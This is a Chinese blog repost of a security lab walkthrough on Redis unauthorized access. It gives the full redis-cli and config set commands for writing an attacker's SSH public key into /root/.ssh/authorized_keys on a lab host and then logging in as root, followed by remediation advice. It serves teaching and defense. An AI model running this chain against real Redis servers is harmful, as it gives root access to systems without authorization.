Redis 未授权访问漏洞

最新推荐文章于 2024-06-15 19:00:08 发布
最新推荐文章于 2024-06-15 19:00:08 发布
阅读量717 收藏
点赞数
分类专栏: web安全漏洞 文章标签: 漏洞

转自:https://www.ichunqiu.com/vm/59321/1
实验需了解:
Redis是一个高性能的key-value数据库
Redis暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且在没有开启相关认证和添加相关安全策略的情况下可以导致任意用户在访问目标服务器时未授权访问Redis以及读取Redis的数据。利用Redis自身的相关方法,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys文件中,进而可以直接登录目标服务器。Redis作为数据库,保存着各种各样的数据,如果存在未授权访问的情况,将会导致数据的泄露,其中包含保存的用户信息等。

实验环境
操作机:Kali-Linux

目标服务器:172.16.12.2

实验目的

熟悉Redis未授权访问漏洞的原理及其利用方法
Redis未授权访问配合SSH key的综合利用

实验工具

**Kali:**Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。

Redis:**Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的**API

实验内容
Redis 未授权访问

Redis 默认情况下会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

Redis未授权访问配合SSH key的综合利用

攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。

修复建议

1、配置bind选项,限定可以连接Redis服务器的IP,修改 Redis 的默认端口6379

2、配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中

3、配置rename-command 配置项 “RENAME_CONFIG”,这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度

4、好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如config等。

了解原理:
部分 Redis默认绑定在 0.0.0.0:6379,并且没有开启认证(这是Redis 的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,将会导致 Redis 服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。 利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器
未授权访问—>写入ssh公钥–>变更Redis DB文件及存放地点

操作流程:(重点)

top one:在本地生产公私钥文件

打开kali在终端输入命令:

ssh-keygen -t rsa
在本地生产公私钥文件

之后会提示输入密码,输入密码并确认

top two:将公钥写入foo.txt文件

执行命令:

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt
将echo的两条命令写入tmp目录下的foo.txt文件中

执行上述命令后,会在tmp目录下面生成一个foo.txt的文件,里面包含着我们所需要的公钥。

top three:连接Redis写入文件

利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。
首先执行命令:

cat /tmp/foo.txt | redis-cli -h 172.16.12.2 -p 6379 -x set crackit
-h后面跟的是目标机器的ip地址,-p后面跟的是redis绑定的端口号
设置一个地址名crackit指向/tmp/foo.txt

接下来执行命令,去连接目标主机

redis-cli -h 172.16.12.2-p 6379
-h后面跟的是目标机器的ip地址,-p后面跟的是redis绑定的端口号。

连接成功之后,我们依次执行以下四条命令:

config set dir /root/.ssh/

config get dir

config set dbfilename "authorized_keys"

save

exit

top four:通过SSH登录目标主机

ssh root@172.16.12.2 -p 22  -i  ~/.ssh/id_rsa

来查看一下ip地址,确认登录成功。最后输入以下命令查看是否连接上服务器的IP地址:

ip address show

实验图解:
这里写图片描述

这里写图片描述

这里写图片描述
图中显示服务器的IP地址为:
172.16.12.2
实验结果分析与总结

Redis未授权访问可能造成的危害

数据库数据泄露

Redis 作为数据库,保存着各种各样的数据,如果存在未授权访问的情况,将会导致数据的泄露,其中包含保存的用户信息等。

代码执行

Redis可以嵌套Lua脚本的特性将会导致代码执行,危害同其他服务器端的代码执行。

敏感信息泄露

通过 Redis 的 INFO 命令,可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫

Unitue_逆流
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Redis授权访问漏洞
谢公子的博客
11-29 4317
目录 Redis 扫描 授权登录以及利用 一:写入SSH公钥,进行远程登录 二:定时任务反弹shell 三:写入一句话木马 四:写入/etc/passwd文件 Windows环境的Redis如何Getshell 一、写入木马到开机启动目录(需重启) 二:写入木马到网站路径 Redis Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志...
Redis授权访问漏洞复现
weixin_43061533的博客
11-24 211
0x01 漏洞简述 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。攻击者在授权访问Redis的情况下,利用Redis自身的提
redis授权访问
最新发布
san3144393495的博客
06-15 1295
redis非关系型数据库。
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Foreverlove112的博客
09-22 510
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
zookeeper授权访问(CVE-2014-0085)漏洞修复建议
THZLYXX的博客
01-24 3438
xxxx为需要设置的四字命令,添加多命令请使用逗号进行隔开,请根据系统所需进行命令设置,请勿添加envi命令,如系统有使用此命令的需求请使用其他修复方法。1.进入zookeeper目录找到zoo.cfg文件,常见路径为/opt/zookeeper-3.4.13/conf/zoo.cfg。2.使用下面命令登录zookeeper命令中ip为容器ip如果直接安装在服务器上请使用服务器ip。2.使用vi编辑器打开zoo.cfg文件,在文件中添加四字命令白名单,添加命令如下。:访问(Access)
Redis 授权访问
qq_61553520的博客
05-17 520
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权.pdf
12-02
本文主要涉及的是网络安全领域中的一个常见问题,即如何利用Redis授权访问漏洞进行提权。Redis是一款开源的、高性能的键值数据库,常用于数据缓存和快速数据处理。当Redis配置不当,允许授权的外部访问时,攻击...
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis授权访问解析
weixin_46941625的博客
12-02 923
本篇主要从redis授权访问入手,还原一些黑客的攻击场景,介绍一些常用的攻击方法和安全知识。应用介绍漏洞介绍测试环境说明攻击方法redis日志 修复方案作者:悦潺@安全之光一. 应用介绍  Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数据库。和Memcached类似,它支持存储的value 类型相对更多,包括 string(字符串)、list ( 链表)、 set(集合)、zset(sorted set – 有序集合)和 hash(哈希类型
【LDAP】LDAP 授权访问漏洞修复方案
Mrerlou的博客
12-12 3366
最近生产环境中,被安全团队扫描到了 LDAP服务存在授权访问漏洞。这里记录下如何解决。
Nacos授权访问复现及修复
大数据姐姐
01-22 3444
Nacos授权访问修复,开启鉴权
redis故障记录
weixin_30898109的博客
12-16 172
最近线上的redis出现无法访问的现象,redis-cli能进入,但是任何命令都提示需要密码验证,以前一直都没有设置密码的,重启redis后正常,没过多久又出现了这个问题。 在此记录下解决方法。 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis 授权访问的问题是...
常见授权访问漏洞修复
qq_41945550的博客
06-02 4633
MongoDB是一个基于分布式文件存储的数据库,由C++语言编写,旨在为WEB应用提供可扩展的高性能数据存储解决方案。MongoDB默认端口为27017。开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。
授权访问漏洞原理及复现
qq_41679358的博客
08-25 5568
本文转自行云博客https://www.xy586.top/ 文章目录授权访问前提知识ssh免密登录客户端服务端安装Redis数据库Redis语法原理攻击复现利用计划任务执行命令反弹shell写ssh-keygen公钥然后使用私钥登陆往web物理路径写webshell防御方法 授权访问 前提知识 ssh免密登录 客户端 进入.ssh文件cd .ssh/ 生成公私钥ssh-keygen -t rsa 上传公钥到服务端 ssh-copy-id user@ip 更改.ssh目录跟私钥的权限 chmod 7.
TiDB丨Etcd API 授权访问漏洞的修复
在数字化道路无限探索
12-28 1757
一文教你轻松修复漏洞
Redis授权访问漏洞是什么?如何复现(包括整理出在复现过程中遇到的各种问题)+编写扫描检测脚本
sGanYu
03-19 6404
目录 Redis授权访问漏洞原理 环境配通常来说置:CentOS下安装Redis 手工授权访问验证 利用方式 在攻击机中使用ssh免密登陆靶机 利用漏洞写入webshell 编写脚本检测 授权访问漏洞可以理解为安全配置不当、在需要进行权限认证处对当前用户进行权限识别,导致攻击者在没有获取到登录权限或授权的情况下,对目标进行操作或者被信息泄露 常见的授权漏洞Redis 授权访问漏洞 MongoDB 授权访问漏洞 JBOSS 授权访问漏洞 VNC 授权访问漏洞 宝塔
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值